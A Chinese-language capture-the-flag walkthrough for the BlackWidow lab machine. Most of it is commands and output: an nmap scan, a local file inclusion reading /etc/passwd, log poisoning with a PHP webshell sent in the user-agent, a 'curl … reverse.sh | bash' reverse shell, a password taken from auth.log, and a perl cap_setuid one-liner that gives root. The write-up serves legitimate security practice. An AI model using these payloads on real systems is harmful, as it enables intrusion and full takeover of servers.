BlackWidow
备注
[Linux VM] [Tested on VirtualBox] created by || 0xJin
⏲️ Release Date // 2021-05-07
✔️ MD5 // 1cc57898485241d95638f83111a442e9
☠ Root // 38
💀 User // 37
📝Notes // Hack and fun.
靶机启动
靶机 IP
192.168.56.121
nmap 信息搜集
Nmap scan report for 192.168.56.121
Host is up (0.00037s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)
| 256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)
|_ 256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 49461/udp mountd
| 100005 1,2,3 49789/tcp mountd
| 100005 1,2,3 51488/udp6 mountd
| 100005 1,2,3 58375/tcp6 mountd
| 100021 1,3,4 35981/tcp nlockmgr
| 100021 1,3,4 39103/udp nlockmgr
| 100021 1,3,4 39461/udp6 nlockmgr
| 100021 1,3,4 45989/tcp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
35043/tcp open mountd 1-3 (RPC #100005)
35981/tcp open nlockmgr 1-4 (RPC #100021)
36125/tcp open mountd 1-3 (RPC #100005)
49789/tcp open mountd 1-3 (RPC #100005)
Web 服务 Port-80
尝试使用 /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 作为字典进行目录爆破,得到
[17:52:13] 301 - 315B - /docs -> http://192.168.56.121/docs/
[17:52:13] 301 - 318B - /company -> http://192.168.56.121/company/
[17:52:16] 301 - 313B - /js -> http://192.168.56.121/js/
[17:59:01] 403 - 279B - /server-status
在访问 http://192.168.56.121/company/ 的过程中,在网络流量中发现以下数据
<!-- =======================================================
* Template Name: Arsha - v3.0.3
* Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
========================================================
We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.
-->
尝试对 /company/ 这个子目录进行爆破扫描
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 42271]
/assets (Status: 301) [Size: 325] [--> http://192.168.56.121/company/assets/]
/forms (Status: 301) [Size: 324] [--> http://192.168.56.121/company/forms/]
/changelog.txt (Status: 200) [Size: 1175]
/Readme.txt (Status: 200) [Size: 222]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/started.php (Status: 200) [Size: 42271]
尝试访问 /started.php?file=../../../../../etc/passwd
# http get http://192.168.56.121/company/started.php?file=../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin
继续回顾上面得到的信息,发现一个链接 http://blackwidow/company/started.php
将这个路由添加到 /etc/hosts
192.168.56.121 blackwidow
备注
这里是否设置这个 hostname 其实都不会有什么影响
本地包含日志文件实现 webshell 部署
┌─[randark@parrot]─[~]
└──╼ $ http get http://192.168.56.121/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 159
Content-Type: text/html; charset=UTF-8
Date: Sun, 25 Feb 2024 16:10:19 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
......
192.168.56.102 - - [25/Feb/2024:11:10:14 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 203 "-" "HTTPie/3.2.1"
192.168.56.102 - - [25/Feb/2024:11:10:16 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 203 "-" "HTTPie/3.2.1"
尝试一下,可以通过 user-agent 将特定字符串写入日志文件,从而部署一个 webshell 进去
curl http://192.168.56.121/ --user-agent "<?php system($_GET['shell']); ?>"
然后
http get "http://192.168.56.121/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=cat+/etc/passwd"
在返回中就可以发现已经成功读取了 /etc/passwd 文件
尝试借助恶意脚本投送服务器实现反向 shell
┌─[randark@parrot]─[~]
└──╼ $ http get "http://192.168.56.121/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=curl+192.168.56.102/reverse.sh+|+bash"
User - www-data
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs -lp 9999
[00:26:56] Welcome to pwncat 🐈!
[00:27:00] received connection from 192.168.56.121:39342
[00:27:01] 192.168.56.121:39342: registered new host w/ db
(local) pwncat$ back
(remote) www-data@blackwidow:/var/www/html/company$ whoami
www-data
读取 SSH 认证日志
(remote) www-data@blackwidow:/var/backups$ cat auth.log | grep sshd
......
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
......
得到一串疑似
viper:?V1p3r2020!?
User - viper
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs viper@192.168.56.121
[00:48:05] Welcome to pwncat 🐈!
Password: ************
[00:48:11] 192.168.56.121:22: normalizing shell path
[00:48:12] 192.168.56.121:22: registered new host w/ db
(local) pwncat$ back
(remote) viper@blackwidow:/home/viper$ whoami
viper
flag - user
(remote) viper@blackwidow:/home/viper$ cat local.txt
d930fe79919376e6d08972dae222526b
环境探测
getcap -r / 2>/dev/null
/home/viper/backup_site/assets/vendor/weapon/arsenic = cap_setuid+ep
/usr/bin/perl =
/usr/bin/perl5.28.1 =
/usr/bin/ping = cap_net_raw+ep
/usr/lib/squid/pinger = cap_net_raw+ep
在其中发现了一个特殊的 cap_setuid 权限,并且为一个可接管文件 /home/viper/backup_site/assets/vendor/weapon/arsenic
分析利用方式
查看 /home/viper/backup_site/assets/vendor/weapon/arsenic 文件的形式
(remote) viper@blackwidow:/home/viper$ file /home/viper/backup_site/assets/vendor/weapon/arsenic
/home/viper/backup_site/assets/vendor/weapon/arsenic: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=36da142560b2aa57fcade932db83015f6f612052, stripped
(remote) viper@blackwidow:/home/viper$ /home/viper/backup_site/assets/vendor/weapon/arsenic --version
This is perl 5, version 28, subversion 1 (v5.28.1) built for x86_64-linux-gnu-thread-multi
(with 65 registered patches, see perl -V for more detail)
Copyright 1987-2018, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
那就很简单了,这个文件就是 perl 程序,直接利用就行
User - root
(remote) viper@blackwidow:/home/viper$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec"/bin/bash";'
root@blackwidow:~# whoami
root
flag - root
root@blackwidow:/root# cat root.txt
▄▄▄▄· ▄▄▌ ▄▄▄· ▄▄· ▄ •▄ ▄▄▌ ▐ ▄▌▪ ·▄▄▄▄ ▄▄▌ ▐ ▄▌
▐█ ▀█▪██• ▐█ ▀█ ▐█ ▌▪█▌▄▌▪ ██· █▌▐███ ██▪ ██ ▪ ██· █▌▐█
▐█▀▀█▄██▪ ▄█▀▀█ ██ ▄▄▐▀▀▄· ██▪▐█▐▐▌▐█·▐█· ▐█▌ ▄█▀▄ ██▪▐█▐▐▌
██▄▪▐█▐█▌▐▌▐█ ▪▐▌▐██�█▌▐█.█▌ ▐█▌██▐█▌▐█▌██. ██ ▐█▌.▐▌▐█▌██▐█▌
·▀▀▀▀ .▀▀▀ ▀ ▀ ·▀▀▀ ·▀ ▀ ▀▀▀▀ ▀▪▀▀▀▀▀▀▀▀• ▀█▄▀▪ ▀▀▀▀ ▀▪
Congrats!
You've rooted Black Widow!
0xJin - mindsflee
Follow on Instagram: 0xjiin
Follow on Twitter: 0xJin , @mindsflee
0780eb289a44ba17ea499ffa6322b335